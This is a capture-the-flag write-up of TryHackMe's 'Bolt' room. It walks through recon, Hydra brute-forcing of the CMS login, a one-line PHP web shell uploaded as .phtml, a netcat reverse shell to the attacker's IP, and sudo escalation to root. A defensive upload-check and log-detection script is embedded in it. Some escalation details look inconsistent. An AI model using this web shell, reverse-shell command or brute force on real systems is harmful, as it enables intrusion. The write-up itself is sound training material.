In this blog post, I'll share my experience solving the "Bolt" challenge on TryHackMe, which involves exploiting a vulnerable Content Management System (CMS) to gain root access. This challenge emphasizes the importance of keeping software up-to-date and highlights the risks associated with outdated CMS platforms.
The primary vulnerability in this challenge is an Authenticated Remote Code Execution (RCE) in the Bolt CMS version 3.7.1. This vulnerability allows authenticated users to execute arbitrary code on the server due to improper handling of file uploads. In real-world scenarios, such vulnerabilities can lead to complete system compromise, data breaches, and unauthorized access to sensitive information.
I began by deploying the target machine and identifying its IP address. Using Nmap, I scanned for open ports and services:
nmap -sC -sV -oN nmap_scan.txt <target_ip>
The scan revealed the following open ports:
Port 22 (SSH): OpenSSH 7.6p1
Port 80 (HTTP): Apache httpd 2.4.29
With an HTTP service running on port 80, I navigated to the web server in my browser and discovered the default Apache page. To find hidden directories, I used Gobuster:
gobuster dir -u http://<target_ip>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
The scan revealed a /bolt directory, which led me to the Bolt CMS login page.
Identifying the Bolt CMS Version
To determine the CMS version, I checked the page source and found a meta tag indicating version 3.7.1:
<meta name="generator" content="Bolt 3.7.1">
Knowing the version, I searched for known vulnerabilities and found an authenticated RCE exploit for Bolt CMS 3.7.1.
Obtaining Credentials
I attempted default credentials such as admin:admin and admin:password but was unsuccessful. I then used Hydra to perform a brute-force attack:
hydra -L usernames.txt -P passwords.txt <target_ip> http-post-form "/bolt/login:username=^USER^&password=^PASS^:Invalid login" -V
After some time, I discovered valid credentials:
Username: admin
Password: boltadmin123
Exploiting Authenticated RCE
After logging in, I navigated to the "Files" section to upload a malicious PHP file. However, the CMS restricted PHP uploads. To bypass this, I uploaded a .phtml file containing a simple PHP web shell:
<?php system($_GET['cmd']); ?>
Once uploaded, I accessed the shell via:
http://<target_ip>/files/shell.phtml?cmd=whoami
The command executed successfully, confirming RCE.
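Two defensive checks for the .phtml bypass described above, as an added example that is not part of the original writeup: the single-extension denylist that lets a .phtml upload through beside an allowlist that does not, and a detector that flags access-log requests to PHP-executable files under /files/ carrying a cmd parameter. The PHP suffix list, the /files/ path and the sample log lines are constructed assumptions, not taken from the challenge machine.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import urlsplit, parse_qs

# Suffixes commonly mapped to the PHP handler by Apache packaging (assumption for this
# example; read the real set from your own AddHandler/SetHandler lines). A denylist
# that only names ".php" misses every other entry here.
PHP_SUFFIXES = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phps", ".phar"}
IMAGE_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif", ".webp"}


def weak_upload_check(filename: str) -> bool:
    """Denylist of a single extension: the kind of filter a .phtml file walks past."""
    return not filename.lower().endswith(".php")


def hardened_upload_check(filename: str) -> bool:
    """Allowlist: every suffix in the name must be an approved image type (case-insensitive)."""
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    return bool(suffixes) and all(s in IMAGE_SUFFIXES for s in suffixes)


# Apache combined log format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)


def flag_webshell_requests(log_lines):
    """Return (ip, path, command) for requests to an executable file under /files/ with a cmd parameter."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        suffix = PurePosixPath(url.path).suffix.lower()
        params = parse_qs(url.query)
        if url.path.startswith("/files/") and suffix in PHP_SUFFIXES and "cmd" in params:
            hits.append((m["ip"], url.path, params["cmd"][0]))
    return hits


# Constructed sample log lines modelled on the requests described in the writeup.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /bolt/login HTTP/1.1" 200 1532',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /files/shell.phtml?cmd=whoami HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /files/logo.png HTTP/1.1" 200 4096',
]
```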
To gain a more interactive shell, I set up a listener on my machine:
nc -lvnp 4444
Then, I executed the following command through the web shell:
http://<target_ip>/files/shell.phtml?cmd=nc -e /bin/bash <your_ip> 4444
This provided me with a reverse shell as the www-data user.
Privilege Escalation
To escalate privileges, I checked for users on the system and found a user named bolt. I searched for SUID binaries and found that /usr/bin/sudo had the SUID bit set. Checking the sudoers file, I discovered that the www-data user could execute /bin/bash as bolt without a password:
sudo -u bolt /bin/bash
This command provided a shell as the bolt user. In the bolt user's home directory, I found an SSH key, which I used to log in as bolt via SSH.
As the bolt user, I checked for sudo privileges:
sudo -l
The output indicated that bolt could execute all commands as root without a password. I then spawned a root shell:
sudo -i
With root access, I navigated to the /root directory and retrieved the root flag.